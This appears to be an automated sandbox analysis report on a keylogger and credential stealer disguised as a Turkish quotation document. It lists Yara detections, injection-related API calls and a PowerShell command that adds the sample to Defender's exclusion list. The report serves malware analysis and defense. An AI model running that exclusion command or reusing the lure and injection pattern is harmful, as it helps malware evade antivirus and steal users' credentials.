Analysis Process: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exePID: 7916, Parent PID: 4084

General

Target ID:	1
Start time:	13:09:55
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe"
Imagebase:	0x2e0000
File size:	1'077'248 bytes
MD5 hash:	170C62D3CA5F52D7307613CC070194B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1452496590.0000000003788000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:09:56
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe"
Imagebase:	0x670000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exePID: 8084, Parent PID: 7916

General

Target ID:	4
Start time:	13:09:56
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe"
Imagebase:	0xa20000
File size:	1'077'248 bytes
MD5 hash:	170C62D3CA5F52D7307613CC070194B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3863457237.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3866206375.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3866206375.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	13:09:56
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exePID: 7916, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.4%
Total number of Nodes:	209
Total number of Limit Nodes:	10

Executed Functions

Function 06A30040 Relevance: 1.2, Instructions: 1236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19cd27b0831414bb70d96b7ceb1827f19a31d9b998b8f2f1a7cd6c832af99e64
Instruction ID: 7998905c8ec24507ef813c6cb646fea12bc2ad4c42724d71124c1635043de8ae
Opcode Fuzzy Hash: 19cd27b0831414bb70d96b7ceb1827f19a31d9b998b8f2f1a7cd6c832af99e64
Instruction Fuzzy Hash: BCB21874B00225CFDB54EF69C954A69BBF2BF88700F1584A9E84ADB365DB30EC81CB51

Function 06A3D6C0 Relevance: .6, Instructions: 633COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e68dca3434abd6106b04b8ac9835b6aba677509216dd2e0b0f77080143e64b8
Instruction ID: 1beda60f04484c87653c7de8e31b69359a24291f3b8cbc0bcecb25c746501358
Opcode Fuzzy Hash: 8e68dca3434abd6106b04b8ac9835b6aba677509216dd2e0b0f77080143e64b8
Instruction Fuzzy Hash: 89424730A01314DFDB94EF68C584A6ABBF2BF89701F1584A9E506DB392DB34EC41CB90

Function 06A353B8 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdfa4eb4dde675e1283f10173a82564df4cc42f1bd7464ed0b7e60a15f80584f
Instruction ID: 4f6d79f2aed90d573a0fe77bde439af9349d56488ba2013adab0b9204ebde358
Opcode Fuzzy Hash: bdfa4eb4dde675e1283f10173a82564df4cc42f1bd7464ed0b7e60a15f80584f
Instruction Fuzzy Hash: 65424A30E10710CFDBA5EF29D58866ABBF2BF84316F148469E542CF695DB39E881CB50

Function 06A32B18 Relevance: .5, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baccaa5f06d29a4afd979a74ec254d67db18f8884c8847f604d4073d0e75cb75
Instruction ID: 5b8def3d079db7285ecbbaae38d083448b431d32c491d8e2473708f09a1763e0
Opcode Fuzzy Hash: baccaa5f06d29a4afd979a74ec254d67db18f8884c8847f604d4073d0e75cb75
Instruction Fuzzy Hash: 2DF19C35B04324DFEB956B249855B6EBAF6EF88B51F148029F8069B391CB34CE41CBD1

Function 06A3CF50 Relevance: .5, Instructions: 456COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da6d9d2d8534b79deb96556ce9b7a9b6d2b9269ddd421c0c4294cd8fc9ff5c67
Instruction ID: 411913930dfbdb17aa70414b833193bbf9250284f1a9d07e843bcf39e2079882
Opcode Fuzzy Hash: da6d9d2d8534b79deb96556ce9b7a9b6d2b9269ddd421c0c4294cd8fc9ff5c67
Instruction Fuzzy Hash: A2123974A00315CFDB44EF68C584AAABBF2FF89210B19C499E549DB362C730ED45CBA1

Function 06A3A0C8 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf80d9c6f5d7f9052d3443e7858faa8b3061e1b0a46231e9052bea43b48ca25e
Instruction ID: 2cdb90a87fb154f504aaada499ec0004662ccdc12dde60f16cdc47ed3ad717e7
Opcode Fuzzy Hash: cf80d9c6f5d7f9052d3443e7858faa8b3061e1b0a46231e9052bea43b48ca25e
Instruction Fuzzy Hash: 43026B35A00724CFDBA5DF69C584AAAFBF2FF88300F148569E9968B761D734E841CB40

Function 06A37F20 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2b96c58b623d193e34964c3b3b5df697fc1378ccd454e0ff86beb3a312e11c0
Instruction ID: bdfc23e8adfd15af79d0b971ad701a689196e7cb2429477f344b0fd8adb650d9
Opcode Fuzzy Hash: e2b96c58b623d193e34964c3b3b5df697fc1378ccd454e0ff86beb3a312e11c0
Instruction Fuzzy Hash: 5AF15D34A003159FDB48EFA4C844AAEBBF2FF88701F158469E916AF355DB39E845CB50

Function 00C23E40 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1451269605.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7a41d218a7e8ffa5b4806c06c0c24763db94fd26dde77fceac43106c4506e1d
Instruction ID: 28511c11fc379d90b491270f0723844df5b895b523cf278af2ec632b7338bf44
Opcode Fuzzy Hash: a7a41d218a7e8ffa5b4806c06c0c24763db94fd26dde77fceac43106c4506e1d
Instruction Fuzzy Hash: CFE17D74A00218CFDB54DFA9D984B9DBBF2BF89300F1481AAD409AB365DB31AD85DF50

Function 00C27288 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1451269605.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f873203b68e82c90d281fb8b535228cff2729616cfd3a190716426778d933110
Instruction ID: bc5f76c586c607ccd5824c4b3a446d1ab175f15bef1a66e0213adf3fac5d00fc
Opcode Fuzzy Hash: f873203b68e82c90d281fb8b535228cff2729616cfd3a190716426778d933110
Instruction Fuzzy Hash: B2B18F74E01218DFDB54DFA9D994A9DBBF2BF88300F1481AAE409AB365DB30AD41CF50

Function 06A99CCC Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2832315bdc9ec1738a39a4fd3eecb50eea8a27fb371af080df1e75b316d819eb
Instruction ID: 869c47da9a5f4c3ed54f338a45de884c5976c3955a0c50fd17eb6cc4101c17f1
Opcode Fuzzy Hash: 2832315bdc9ec1738a39a4fd3eecb50eea8a27fb371af080df1e75b316d819eb
Instruction Fuzzy Hash: 9FB09234D8F140DEEFC17F2455440B5F6FC1B5F100B653992821AA70138404D40446B8

Function 069A2350 Relevance: 9.5, Strings: 5, Instructions: 3256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ld.t, xrefs: 069A4C71
:.t, xrefs: 069A4F84
(:.t, xrefs: 069A4E56
09.t, xrefs: 069A4D33
H;.t, xrefs: 069A4C10

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: (:.t$09.t$H;.t$Ld.t$:.t
API String ID: 0-110458475
Opcode ID: c7bea1ee5d614fec9b7922a875714a8fcbd4a14edbe6b1ffb3a18d7563e20d42
Instruction ID: 9bed25822ea7470fa585350ed13f1171a73c8d0859857f31da9dd30624800dd0
Opcode Fuzzy Hash: c7bea1ee5d614fec9b7922a875714a8fcbd4a14edbe6b1ffb3a18d7563e20d42
Instruction Fuzzy Hash: 39636F70A00218EFEB25AB90DC45BAD7BB6FF89740F5040D9E6496B290CF71AE80DF55

Function 06A11170 Relevance: 3.3, Instructions: 3299
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4628b99f9becbad04fe8faf6aa8f933d7b063489af07e682288ca13019e29380
Instruction ID: 63a14ff84647f52c6afda48f85270a25f025aa4dd55ca8208f1582cee71fbeeb
Opcode Fuzzy Hash: 4628b99f9becbad04fe8faf6aa8f933d7b063489af07e682288ca13019e29380
Instruction Fuzzy Hash: 18633C70A403189FEB259B90DC55BDEBAB2EB88B00F5040E9E30A7B6D0DB755F809F55

Function 069AEE68 Relevance: 2.7, Strings: 2, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

;-, xrefs: 069AEF7E
7, xrefs: 069AEFB9

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: ;-$7
API String ID: 0-3582119738
Opcode ID: d87145f5a2b66ec8e534239e8b8c72356f73ab5f92fe0c65669c3541a566f6f8
Instruction ID: e7af8c8129926ce91bc3c595201e82d5d86ec68c6fefe0cce5cc6479fd30ea76
Opcode Fuzzy Hash: d87145f5a2b66ec8e534239e8b8c72356f73ab5f92fe0c65669c3541a566f6f8
Instruction Fuzzy Hash: 29A14934A003058FDB54DFA4C994A6EBBF6BFC8700B248559E906AB765DF70ED02CB90

Function 06A97C1C Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A97E5E

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 399dd26eea418dc9cd7d43ba5eed4ddbb4beff57c1b2ecfaafee91ba935a4517
Instruction ID: c1c2c2ce443e466cfcb2b3af666e974164fd6659254c85fd0343ba8b563dacee
Opcode Fuzzy Hash: 399dd26eea418dc9cd7d43ba5eed4ddbb4beff57c1b2ecfaafee91ba935a4517
Instruction Fuzzy Hash: 8FA15A71D102199FEF60DF69C841BEDBBF2BF44714F24856AE808A7280DB749985CFA1

Function 06A97C28 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A97E5E

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7625ebe88fd022126482d0939dd52ac4ba3d44c4f7e58a87c258457feff4eaed
Instruction ID: ee70b78c660f24e5353ef4372c22daebe89b33a43084d36098a8d2e81072248f
Opcode Fuzzy Hash: 7625ebe88fd022126482d0939dd52ac4ba3d44c4f7e58a87c258457feff4eaed
Instruction Fuzzy Hash: 4E914A71D102298FEF60DF69C841BEDBBF2BF44714F248569E808A7280DB749985CFA1

Function 069A5C00 Relevance: 1.7, Strings: 1, Instructions: 471
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 069A5E55

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 1df8519d5e857a8c99bbd8f5833e4ec53d826cbe14b1183a3cd042b2422eb065
Instruction ID: 26d81aaace2bd5baa3a961527d59ee26b382778916b2dec5c259fdf259ee47d3
Opcode Fuzzy Hash: 1df8519d5e857a8c99bbd8f5833e4ec53d826cbe14b1183a3cd042b2422eb065
Instruction Fuzzy Hash: 50025734B007018FDB54CF59C484AAABBF6FF88314B26C669D45A9BB65C730EC46CB90

Function 00C2B6C0 Relevance: 1.7, APIs: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00C2B926

Memory Dump Source

Source File: 00000001.00000002.1451269605.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 470ddf43d1c342781f1263cdfcf30a2012cb709d329ad0e8c6f8f2d479af8dc6
Instruction ID: a4061fc44be4e2032deaef3c1f7b67d28ea9d05bb64aa540b750d7e413cc1d42
Opcode Fuzzy Hash: 470ddf43d1c342781f1263cdfcf30a2012cb709d329ad0e8c6f8f2d479af8dc6
Instruction Fuzzy Hash: 7B8175B0A00B158FD724DF2AE45075ABBF1FF88700F00892ED49AD7A50EB74E949CB90

Function 069AC820 Relevance: 1.7, Strings: 1, Instructions: 437
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Agl^, xrefs: 069ACB12

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: Agl^
API String ID: 0-583398382
Opcode ID: 2b294c3b4d545be880a8bc22e2a18fe5ef8f3b16e3afae1fdfdf1edae2e90d8e
Instruction ID: d0d53dabc75e7d2d7d0b80ddae0c18c5ad7b57fd26ab7cfdd05c9fb409cb8b89
Opcode Fuzzy Hash: 2b294c3b4d545be880a8bc22e2a18fe5ef8f3b16e3afae1fdfdf1edae2e90d8e
Instruction Fuzzy Hash: 4AF16C30A00305CBDB55AB68E950A6E7BF6FFC4A44B148529E416EFB48EF34ED058BC5

Function 00C244C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00C259C9

Memory Dump Source

Source File: 00000001.00000002.1451269605.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9c12c01bc5207dc974ed001b241743f110f4bb7fdf2929c9ed41cc4326d4a6f3
Instruction ID: 892ac20bbc8607f197e73ab8cae367b20ba4932f529e7e3c93c0182057c7604f
Opcode Fuzzy Hash: 9c12c01bc5207dc974ed001b241743f110f4bb7fdf2929c9ed41cc4326d4a6f3
Instruction Fuzzy Hash: ED41E1B1C00729CFDB24DFA9C88579EBBB1FF88714F20856AD508AB251DB716946CF90

Function 00C2590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00C259C9

Memory Dump Source

Source File: 00000001.00000002.1451269605.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b206d2d2fa6d0a8e9f18e7b5ab75b597dfe4b508da1fbbd7140ae0ebaaa74400
Instruction ID: 862688fa0692d7b1da57ea5d7da1d9a23fb626a09e5df96c366af7509f63861c
Opcode Fuzzy Hash: b206d2d2fa6d0a8e9f18e7b5ab75b597dfe4b508da1fbbd7140ae0ebaaa74400
Instruction Fuzzy Hash: 9C41F2B1C00729CFDB24DFA9C88479EBBF2BF88714F20855AD408AB250DB756946CF50

Function 075F018C Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,075F101D,?,?), ref: 075F10CF

Memory Dump Source

Source File: 00000001.00000002.1456251668.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_75f0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: d5910cbf3801535c25e0ccb835bf0aa2b052ef6c2fdd145ce251574af3e6f16b
Instruction ID: 85f215ed862bec522718c29151bf163edbcff22e463340d05d197d8ecacc4adb
Opcode Fuzzy Hash: d5910cbf3801535c25e0ccb835bf0aa2b052ef6c2fdd145ce251574af3e6f16b
Instruction Fuzzy Hash: 6A31D4B590064D9FDB10CF9AD8846DEFBF9FB48310F24841AE515A7210D7759544CFA0

Function 06A9A9A8 Relevance: 1.6, APIs: 1, Instructions: 70
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06A9AA0D

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 695f04330d0e54480c08e0940294ddaa5711bdcc901cffa57dfc49192112b727
Instruction ID: 1760ef7a9bd17079108a366b4574140892f20f4a28a5a893d53bf0506d3a108e
Opcode Fuzzy Hash: 695f04330d0e54480c08e0940294ddaa5711bdcc901cffa57dfc49192112b727
Instruction Fuzzy Hash: 1E21E2B58002499FDB10DF9AD885BDEFBF4EB49220F20840AD558A7650C379A544CFA1

Function 06A9799A Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A97A30

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c7d81a5959d41e2aa17b3325dbeda02908f9848a84d2e519efb65826a9f5bb66
Instruction ID: 313c3a0d41f6fb6a153e42fe21ad1cfb2237fde864b6be1194b2cd05bc7cba43
Opcode Fuzzy Hash: c7d81a5959d41e2aa17b3325dbeda02908f9848a84d2e519efb65826a9f5bb66
Instruction Fuzzy Hash: EA2113759003599FDB10DFAAC881BDEBBF5FF48310F10842AE958A7250D7799944DBA0

Function 06A979A0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A97A30

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ce0ec25a6054fe59a1af838af56892d570a965540457dddcc4ee39c3b1617ddf
Instruction ID: d19347c726e845e27912162ad50d1bf79fd1a88efa3d0e76ee49116edb6373f1
Opcode Fuzzy Hash: ce0ec25a6054fe59a1af838af56892d570a965540457dddcc4ee39c3b1617ddf
Instruction Fuzzy Hash: 292124759003599FDF10DFAAC881BDEBBF5FF48310F10842AE958A7250D7799944DBA0

Function 075F1031 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,075F101D,?,?), ref: 075F10CF

Memory Dump Source

Source File: 00000001.00000002.1456251668.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_75f0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: f78349d7277e47a2677e8f2ede09788771b34bcc136f7674a4f614147c61194d
Instruction ID: f1cf80e0460562367421c90c426602f38465819eda4d5665a695858e20ab0370
Opcode Fuzzy Hash: f78349d7277e47a2677e8f2ede09788771b34bcc136f7674a4f614147c61194d
Instruction Fuzzy Hash: DB31E2B5D0174A9FDB10CFAAD8846DEFBF5BF48220F24841AE919A7210D774A544CFA0

Function 06A97A88 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A97B10

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 95af59a7f729768e033c07266f6f9790c658b7242c3c198250c75468787163b0
Instruction ID: 88e3c4302dc125da545468b4ee2f797bf0e84b23ad6d4b1e44fdb3b5ca70e2ce
Opcode Fuzzy Hash: 95af59a7f729768e033c07266f6f9790c658b7242c3c198250c75468787163b0
Instruction Fuzzy Hash: DB2105B1D003499FDB10DFAAC881BDEBBF5FF48310F50842AE519A7250D7799941DBA1

Function 06A973C8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A9744E

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
